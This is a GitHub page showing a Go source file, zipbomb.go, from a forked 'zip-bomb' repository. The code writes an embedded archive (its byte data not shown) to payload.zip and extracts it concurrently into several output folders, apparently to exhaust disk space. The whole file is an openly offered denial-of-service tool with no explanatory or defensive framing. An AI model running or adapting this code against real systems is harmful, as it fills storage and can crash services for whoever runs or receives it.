forked from NovusEdge/zip-bomb
-
Notifications
You must be signed in to change notification settings - Fork 0
/
zipbomb.go
89 lines (70 loc) · 1.44 KB
/
zipbomb.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
package main
import (
"archive/zip"
"fmt"
"io"
"os"
"path/filepath"
"strings"
"sync"
)
func main() {
iterations := 2
var wg sync.WaitGroup
placePayload()
for i := 0; i < iterations; i++ {
wg.Add(1)
go unzipFile("payload.zip", fmt.Sprintf("%s_%d", "output", i), &wg)
}
wg.Wait()
}
func unzipFile(src, dst string, wg *sync.WaitGroup) {
defer wg.Done()
archive, err := zip.OpenReader(src)
if err != nil {
panic(err)
}
defer archive.Close()
for _, f := range archive.File {
filePath := filepath.Join(dst, f.Name)
fmt.Println("unzipping file ", filePath)
if !strings.HasPrefix(filePath, filepath.Clean(dst)+string(os.PathSeparator)) {
return
}
if f.FileInfo().IsDir() {
os.MkdirAll(filePath, os.ModePerm)
continue
}
if err := os.MkdirAll(filepath.Dir(filePath), os.ModePerm); err != nil {
panic(err)
}
dstFile, err := os.OpenFile(filePath, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, f.Mode())
if err != nil {
panic(err)
}
fileInArchive, err := f.Open()
if err != nil {
panic(err)
}
if _, err := io.Copy(dstFile, fileInArchive); err != nil {
panic(err)
}
dstFile.Close()
fileInArchive.Close()
}
}
func placePayload() {
payload_500Zip, err := payload_500ZipBytes()
if err != nil {
panic(err)
}
payloadFile, err := os.Create("payload.zip")
if err != nil {
panic(err)
}
defer payloadFile.Close()
_, err = payloadFile.Write(payload_500Zip)
if err != nil {
panic(err)
}
}